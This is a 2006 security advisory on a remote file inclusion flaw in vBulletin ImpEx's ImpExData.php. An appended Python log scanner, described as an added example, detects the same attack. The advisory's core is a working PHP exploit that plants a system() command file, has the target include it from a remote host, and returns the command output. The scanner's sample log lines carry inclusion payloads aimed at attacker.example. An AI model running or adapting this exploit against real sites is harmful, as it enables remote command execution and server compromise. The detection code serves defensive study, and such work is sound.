`=======================================================================================
XOR Crew :: Security Advisory
3/22/2006
=======================================================================================
vBulletin ImpEx <= 1.74 - Remote Command Execution Vulnerability
=======================================================================================
http://www.xorcrew.net/
http://www.xorcrew.net/ReZEN
=======================================================================================
:: Summary
Vendor : vBulletin
Vendor Site : http://www.vbulletin.com/docs/html/impex
Product(s) : Impex - vBulletin Import / Export System
Version(s) : All
Severity : Medium/High
Impact : Remote Command Execution
Release Date : 3/22/2006
Credits : ReZEN (rezen (a) xorcrew (.) net)
=======================================================================================
I. Description
The ImpEx (Import / Export) system is the core system for importing from
other forum software into vBulletin version 3.5.0 or higher.
=======================================================================================
II. Synopsis
There is a remote file inclusion vulnerability in the /ImpExData.php file
that allows for remote command execution. The bug is here:

    require_once ($systempath . 'impex/ImpExDatabase.php');

The $systempath variable is not set prior to being used in the
require_once() function. The vendor and support team have been contacted.
=======================================================================================
Exploit code:
-----BEGIN-----
<?php
/*
vbulletin ImpEx Remote File Inclusion Exploit c0ded by ReZEN
Sh0uts: xorcrew.net, ajax, gml, #subterrain, My gf
url: http://www.xorcrew.net/ReZEN
example:
turl: http://www.target.com/impex/ImpExData.php?systempath=
hurl:http://www.pwn3d.com/evil.txt?
*/
$cmd = $_POST["cmd"];
$turl = $_POST["turl"];
$hurl = $_POST["hurl"];
$form= "<form method=\"post\" action=\"".$PHP_SELF."\">"
."turl:<br><input type=\"text\" name=\"turl\" size=\"90\"
value=\"".$turl."\"><br>"
."hurl:<br><input type=\"text\" name=\"hurl\" size=\"90\"
value=\"".$hurl."\"><br>"
."cmd:<br><input type=\"text\" name=\"cmd\" size=\"90\"
value=\"".$cmd."\"><br>"
."<input type=\"submit\" value=\"Submit\" name=\"submit\">"
."</form><HR WIDTH=\"650\" ALIGN=\"LEFT\">";
if (!isset($_POST['submit']))
{
echo $form;
}else{
$file = fopen ("test.txt", "w+");
fwrite($file, "<?php system(\"echo ++BEGIN++\"); system(\"".$cmd."\");
system(\"echo ++END++\"); ?>");
fclose($file);
$file = fopen ($turl.$hurl, "r");
if (!$file) {
echo "<p>Unable to get output.\n";
exit;
}
echo $form;
while (!feof ($file)) {
$line .= fgets ($file, 1024)."<br>";
}
$tpos1 = strpos($line, "++BEGIN++");
$tpos2 = strpos($line, "++END++");
$tpos1 = $tpos1+strlen("++BEGIN++");
$tpos2 = $tpos2-$tpos1;
$output = substr($line, $tpos1, $tpos2);
echo $output;
}
?>
------END------
=======================================================================================
IV. Greets :>
All of xor, Infinity, stokhli, ajax, gml, cijfer, my beautiful girlfriend.
uh ohs!! + /srv/web/lotfree/ + LOTFREE uid 1010 = Lame Frenchies
=======================================================================================
`
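
A log check for the inclusion described in the synopsis, as an added example that is not part of the original advisory: it flags access-log requests to ImpExData.php whose systempath query parameter decodes to a scheme:// URL. The log lines, addresses and host names are constructed, and the function names are hypothetical.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Client and request target of a common/combined-format access log entry.
REQUEST_RE = re.compile(
    r'^(?P<client>\S+) .*?"(?:GET|POST|HEAD) (?P<target>\S+) HTTP/[\d.]+"')
# A value starting with scheme:// points require_once() at a remote resource.
SCHEME_RE = re.compile(r'^\s*[a-z][a-z0-9+.\-]*://', re.I)

def remote_systempath(line):
    """Return (client, decoded value) if the line shows a remote systempath."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    url = urlsplit(m.group("target"))
    if not url.path.lower().endswith("/impexdata.php"):
        return None
    # parse_qsl percent-decodes, so encoded values are compared in clear form.
    # Only the query string is visible here; a POST body is not logged.
    for key, value in parse_qsl(url.query, keep_blank_values=True):
        if key == "systempath" and SCHEME_RE.match(value):
            return m.group("client"), value
    return None

def scan(lines):
    """Return every (client, value) hit found in an iterable of log lines."""
    return [hit for hit in map(remote_systempath, lines) if hit]

# Constructed sample entries (documentation addresses and example hosts).
SAMPLE_LOG = [
    '203.0.113.7 - - [22/Mar/2006:10:01:02 +0000] "GET /impex/ImpExData.php'
    '?systempath=http://attacker.example/x.txt? HTTP/1.1" 200 512',
    '203.0.113.7 - - [22/Mar/2006:10:01:09 +0000] "GET /impex/ImpExData.php'
    '?systempath=http%3A%2F%2Fattacker.example%2Fx.txt HTTP/1.1" 200 498',
    '192.0.2.10 - - [22/Mar/2006:10:02:00 +0000] "GET /impex/index.php'
    ' HTTP/1.1" 200 2048',
    '192.0.2.10 - - [22/Mar/2006:10:02:05 +0000] "GET /forum/showthread.php'
    '?t=12&systempath=http://x.example/ HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for client, value in scan(SAMPLE_LOG):
        print(f"{client} systempath={value}")
```

The second sample entry is percent-encoded, which a plain string match on "systempath=http://" would miss.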